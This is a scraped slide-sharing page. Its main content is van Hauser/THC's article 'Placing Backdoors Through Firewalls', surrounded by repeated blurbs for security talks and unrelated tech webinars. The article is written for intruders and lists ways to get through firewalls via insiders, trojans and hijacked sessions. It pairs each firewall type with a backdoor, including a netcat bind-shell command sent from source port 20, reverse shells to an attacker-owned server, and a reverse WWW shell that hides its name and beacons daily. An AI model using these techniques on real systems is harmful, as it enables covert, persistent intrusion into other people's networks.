This document describes potential backdoor techniques to maintain access to systems behind different types of firewalls. It discusses placing backdoors on internal machines rather than firewall machines. Suggested backdoor methods include using ACK-only telnet, the Loki ICMP tunnel, a UDP-based daemon shell, and exploiting ports left open for non-passive FTP. Insider assistance, exploiting vulnerable external services, hijacking connections, and trojan files are also proposed for initially penetrating firewalls.
Predicting and Abusing WPA2/802.11 Group Keysvanhoefm
We analyze the generation and management of WPA2 group keys. These keys protect broadcast and multicast Wi-Fi traffic. We discovered several issues and illustrate their importance by decrypting all group (and unicast) traffic of a typical Wi-Fi network.
First we show that the 802.11 random number generator is flawed by design, and provides an insufficient amount of entropy. This is confirmed by predicting randomly generated group keys on several platforms. We then examine whether group keys are securely transmitted to clients. Here we discover a downgrade attack that forces usage of RC4 to encrypt the group key when transmitted in the 4-way handshake. The per-message RC4 key is the concatenation of a public 16-byte initialization vector with a secret 16-byte key, and the first 256 keystream bytes are dropped. We study this peculiar usage of RC4, and find that capturing 2 billion handshakes can be sufficient to recover (i.e., decrypt) a 128-bit group key. We also examine whether group traffic is properly isolated from unicast traffic. We find that this is not the case, and show that the group key can be used to inject and decrypt unicast traffic. Finally, we propose and study a new random number generator tailored for 802.11 platforms.
Predicting and Abusing WPA2/802.11 Group Keysvanhoefm
We analyze the generation and management of WPA2 group keys. These keys protect broadcast and multicast Wi-Fi traffic. We discovered several issues and illustrate their importance by decrypting all group (and unicast) traffic of a typical Wi-Fi network.
First we show that the 802.11 random number generator is flawed by design, and provides an insufficient amount of entropy. This is confirmed by predicting randomly generated group keys on several platforms. We then examine whether group keys are securely transmitted to clients. Here we discover a downgrade attack that forces usage of RC4 to encrypt the group key when transmitted in the 4-way handshake. The per-message RC4 key is the concatenation of a public 16-byte initialization vector with a secret 16-byte key, and the first 256 keystream bytes are dropped. We study this peculiar usage of RC4, and find that capturing 2 billion handshakes can be sufficient to recover (i.e., decrypt) a 128-bit group key. We also examine whether group traffic is properly isolated from unicast traffic. We find that this is not the case, and show that the group key can be used to inject and decrypt unicast traffic. Finally, we propose and study a new random number generator tailored for 802.11 platforms.
[ENG] IPv6 shipworm + My little Windows domain pwnieZoltan Balazs
Hacktivity 2011 presentation about IPv6 Teredo protocol, Windows pass-the-hash attack
Original video in Hungarian: http://vimeo.com/31359639
Translated version: http://vimeo.com/31360814
Agenda:
An in depth review of various security mechanisms in the kernel like those added by PAX and grsecurity.
Speaker:
Yehontan Biton, senior kernel developer and computer science researcher for Ben Gurion University of the Negev.
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
This presentation is an introduction to Cuckoo Sandbox, an automated a malware analysis system, and Intelligence to use this tool, at Department of Scientific Criminal Investigation in SungKyunKwan University in Korea.
Martin Čmelík
Security-Portal.cz, Securix.org
http://www.security-session.cz
Přednáška: Hardening Linuxových systemů a představení distribuce Securix GNU/Linux
Přednáška se bude věnovat možnostem zabezpečení Linuxových systémů od té nejnižší až po aplikační vrstvu. Představí možnosti zvýšení bezpečnosti použitelných na všech linuxových distribucích až po MLS (Multi-Level Security) systémy typu Grsec a PaX, které jsou schopné detailního vymezení opravnění a přístupu k resourcům každé aplikace.
[ENG] IPv6 shipworm + My little Windows domain pwnieZoltan Balazs
Hacktivity 2011 presentation about IPv6 Teredo protocol, Windows pass-the-hash attack
Original video in Hungarian: http://vimeo.com/31359639
Translated version: http://vimeo.com/31360814
Agenda:
An in depth review of various security mechanisms in the kernel like those added by PAX and grsecurity.
Speaker:
Yehontan Biton, senior kernel developer and computer science researcher for Ben Gurion University of the Negev.
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
This presentation is an introduction to Cuckoo Sandbox, an automated a malware analysis system, and Intelligence to use this tool, at Department of Scientific Criminal Investigation in SungKyunKwan University in Korea.
Martin Čmelík
Security-Portal.cz, Securix.org
http://www.security-session.cz
Přednáška: Hardening Linuxových systemů a představení distribuce Securix GNU/Linux
Přednáška se bude věnovat možnostem zabezpečení Linuxových systémů od té nejnižší až po aplikační vrstvu. Představí možnosti zvýšení bezpečnosti použitelných na všech linuxových distribucích až po MLS (Multi-Level Security) systémy typu Grsec a PaX, které jsou schopné detailního vymezení opravnění a přístupu k resourcům každé aplikace.
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
It is for the new users those don't have much knowledge regarding IT Security. Here i focus on Windows In built firewall, Comodo, Zone Alarm and Out Post pro configuration basics.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
ppt consists of history, generations of firewalls, types, architectures, advantages & disadvantages.
very basic ppt- can be used for college & paper presentation seminars.
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
1. Placing Backdoors Through Firewalls
---[ Placing Backdoors Through Firewalls ]---
v1.5
Author: van Hauser / THC
----[ Introduction
This article describes possible backdoors through different firewall architectures. However, the material can also be
applied to other environments to describe how hackers (you?) cover their access to a system.
Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new
firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does it's job
and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used.
As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.
----[ Firewall Architectures
There are two basic firewall architectures and each has an enhanced version.
Packet Filters:
This is a host or router which checks each packet against an allow/deny ruletable before routing it
through the correct interface. There are very simple ones which can only filter from the origin host,
destination host and destination port, as well as good ones which can also decide based on incoming
interface, source port, day/time and some tcp or ip flags.
This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm).
Stateful Filters:
This is the enhanced version of a packet filter. It still does the same checking against a rule table and
only routes if permitted, but it also keeps track of the state information such as TCP sequence
numbers. Some pay attention to application protocols which allows tricks such as only opening ports
to the interiour network for ftp-data channels which were specified in a permitted ftp session. These
filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (Thats
because UDP is a stateless protocol. And it's more difficult for RPC services.)
This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the
file:///C|/Documents%20and%20Settings/mwood/Desktop/C...neypots/Placing%20Backdoors%20Through%20Firewalls.htm (1 of 7)8/1/2006 2:05:22 AM
2. Placing Backdoors Through Firewalls
(in)famous Checkpoint FW-1.
Proxies / Circuit Level Gateways:
A proxy as a firewall host is simply any server which has no routing activated and instead has proxy
software installe.
Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration
and/or just a sockd.
Application Gateways:
This is the enhanced version of a proxy. Like a proxy, for every application which should get through
the firewall a software must be installed and running to proxy it. However, the application gateway is
smart and checks every request and answer, f.e. that an outgoing ftp only may download data but not
upload any, and that the data has got no virus, no buffer overflows are generated in answers etc. One
can argue that squid is an application gateway, because it does many sanity checks and let you filter
stuff but it was not programmed for the installation in a secure environment and still has/had security
bugs.
A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk).
Most firewalls that vendors sell on the market are hybrid firwalls, which means they've got more than just one type
implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss
which firewall product is the best, because this is not a how-to-by-a-firewall paper, but I will say this: application
gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies,
stupidity, marketing hype and bad management might rule them out.
----[ Getting in
Before we talk about what backdoors are the best for which firewall architecture we should shed a light on how to
get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies,
this has to be carefully planned and done.
The four main possibilities:
Insider:
There's someone inside the company (you, girl/boy-friend, chummer) who installs the backdoor. This
is the easiest way of course.
Vulnerable Services:
Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may
be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not
protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those
services, he's got good chances to get in. You'd laugh if you'd see how many "firewalls" run sendmail
for mail relaying ...
file:///C|/Documents%20and%20Settings/mwood/Desktop/C...neypots/Placing%20Backdoors%20Through%20Firewalls.htm (2 of 7)8/1/2006 2:05:22 AM
3. Placing Backdoors Through Firewalls
Vulnerable External Server:
People behind a firewall sometimes work on external machines. If an attacker can hack these, he can
cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The
attacker could also send fake ftp answers to overflow a buffer in the ftp client software, replace a gif
picture on a web server with one which crashs netscape and executes a command (I never checked if
this actually works, it crashs, yeah, but I didn't look through this if this is really an exploitable
overflow). There are many possibilities with this but it needs some knowledge about the company.
However, an external web server of the company is usually a good start. Some firewalls are configured
to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particulary
true for the US, where academic environments and industry/military work close together.
Hijacking Connections:
Many companies think that if they allow incoming telnet with some kind of secure authentication like
SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get
in ... Another way of using hijacked connections is to modify replies in the protocol implementation to
generate a buffer overflow (f.e. with X).
Trojans:
Many things can be done with a trojan horse. This could be a gzip file which generates a buffer
overflow (well, needs an old gzip to be installed), a tar file which tampers f.e. ~/.logout to execute
something, or an executable or source code which was modified to get the hacker in somehow. To get
someone running this, mail spoofing could be used or replacing originals on an external server which
internal employees access to update their software regulary (ftp xfer files and www logs can be
checked to get to know which files these are).
----[ Placing the Backdoors
An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines
are usually monitored and checked regulary. It's the internal machines which are usually unprotected and without
much administration and security checks.
I will now talk about some ideas of backdoors which could be implemented. Note that programs which will/would
run on an stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an
application gateway backdoor will work for any architecture.
Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker
anytime he wishes, a "passive" one triggers itself by time/event so an attacker has to wait for this to happen.
Packet Filters:
It's hard to find a backdoor which gets through this one but does not work for any other. The few ones
which comes into my mind
file:///C|/Documents%20and%20Settings/mwood/Desktop/C...neypots/Placing%20Backdoors%20Through%20Firewalls.htm (3 of 7)8/1/2006 2:05:22 AM
4. Placing Backdoors Through Firewalls
is a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp
handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already
established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h
of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).
b) Loki from Phrack 49/51 could be used too to establish a tunnel with icmp echo/reply packets. But
some coding would be needed to to be done.
c) daemonshell-udp is a backdoor shell via UDP
(http://www.thehackerschoice.comlook for thc-uht1.tgz)
d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp
connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp
protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.
Stateful Filters:
Here a hacker must use programs which initiates the connection from the secure network to his
external 0wned server. There are many out there which could be used:
active:
tunnel from Phrack 52.
ssh with the -R option (much better than tunnel ... it's a legtimitate program on a computer and
it encrypts the datastream).
passive:
netcat compiled with the execute option and run with a time option to connect to the hacker
machine (ftp.avian.org).
reverse_shell from the thc-uht1.tgz package (see above) does the same.
Proxies / Circuit Level Gateways:
If socks is used on the firewall, someone can use all those stuff for the stateful filter and
"socksify" them. (www.socks.nec.com) For more advanced tools you'd should take a look at the
application gateway section.
Application Gateways:
Now we get down to the interesting stuff. These beasts can be intelligent so some brain is
needed.
active:
(re-)placing a cgi-script on the webserver of the company, which allows remote access.
This is unlikely because it's rare that the webserver is in the network, not monitored/
checked/audited and accessible from the internet. I hope nobody needs an example on
such a thing ;-)
(re-placing) a service/binary on the firewall. This is dangerous because those are audited
regulary and sometimes even sniffed on permanent ...
Loading a loadable module into the firewall kernel wich hides itself and gives access to
it's master. The best solution for an active backdoor but still dangerous.
passive:
E@mail - an email account/mailer/reader is configured in a way to extract hidden
commands in an email (X-Headers with weird stuff) and send them back with output if
file:///C|/Documents%20and%20Settings/mwood/Desktop/C...neypots/Placing%20Backdoors%20Through%20Firewalls.htm (4 of 7)8/1/2006 2:05:22 AM
5. Placing Backdoors Through Firewalls
wanted/needed.
WWW - this is hard stuff. A daemon on an internal machine does http requests to the
internet, but the requests are in real the answers of commands which were issued by a
rogue www server in a http reply. This nice and easy beast is presented below (-
>Backdoor Example: The Reverse WWW Shell)
DNS - same concept as above but with dns queries and replies. Disadvantage is that it
can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this
example needs still much coding to be any effective)
----[ Backdoor Example: The Reverse WWW Shell
This backdoor should work through any firewall which has got the security policy to allow users to surf the
WWW (World Wide Waste) for information for the sake and profit of the company.
For a better understanding take a look at the following picture and try to remember it onwards in the text:
+--------+ +------------+ +-------------+
|internal|--------------------| FIREWALL |--------------|server owned |
| host | internal network +------------+ internet |by the hacker|
+--------+ +-------------+
SLAVE MASTER
Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall,
this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local
shell and connects to the www server owned by the hacker on the internet via a legitimate looking http
request and sends it ready signal. The legitimate looking answer of the www server owned by the hacker are
in reality the commands the child will execute on it's machine it the local shell. All traffic will be converted
(I'll not call this "encrypted", I'm not Micro$oft) in a Base64 like structure and given as a value for a cgi-
string to prevent caching.
Example of a connection:
Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0
Master replies with
g5mAlfbknz
The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls"
command from the hacker on the external server (MASTER). Some gimmicks:
The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because
if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to
the hacker's server and connects to it himself he will just see a broken webserver because there's a Token
(Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; program masks it's
name in the process listing ...
file:///C|/Documents%20and%20Settings/mwood/Desktop/C...neypots/Placing%20Backdoors%20Through%20Firewalls.htm (5 of 7)8/1/2006 2:05:22 AM
6. Placing Backdoors Through Firewalls
Best of all: master & slave program are just one 260-lines perl file ... Usage is simple: edit rwwwshell.pl for
the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the
MASTER just before it's time that the slave tries to connect.
Well, why coding it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to
use it on a system which hasn't got perl installed, search for a similar machine with perl install, get the a3
compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and
run that one.
The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got
updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at
root@localhost. Check out http://www.thehackerschoice.com for updates.
----[ The Source
Grab it here ...
rwwwshell v2.0
----[ Security
Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a
tight application gateway firewall with a strict policy. email should be put on a centralized mail server, and
DNS resolving only done on the WWW/FTP proxies and access to WWW only prior proxy authentication.
However, this is not enough. An attacker can tamper the mailreader to execute the commands extracted from
the crypted X-Headers or implement the http authentication into the reverse www-shell (it's simple). Also
checking the DNS and WWW logs/caches regulary with good tools can be defeated by switching the external
servers every 3-20 calls or use aliases.
A secure solution would be to set up a second network which is connected to the internet, and the real one
kept seperated - but tell this the employees ... A good firewall is a big improvement, and also an Intrusion
Detection Systems can help. But nothing can stop a dedicated attacker.
----[ Last Words
Have fun hacking/securing the systems ...
Greets to all guys who like + know me ;-) and especially to those good
chummers I've got, you know who you are.
Ciao...
van Hauser / [THC] - The Hacker's Choice
file:///C|/Documents%20and%20Settings/mwood/Desktop/C...neypots/Placing%20Backdoors%20Through%20Firewalls.htm (6 of 7)8/1/2006 2:05:22 AM
7. Placing Backdoors Through Firewalls
For further interesting discussions you can email me at
vh@reptile.rug.ac.be with my public pgp key blow:
Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYNOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----
----[ THE END
file:///C|/Documents%20and%20Settings/mwood/Desktop/C...neypots/Placing%20Backdoors%20Through%20Firewalls.htm (7 of 7)8/1/2006 2:05:22 AM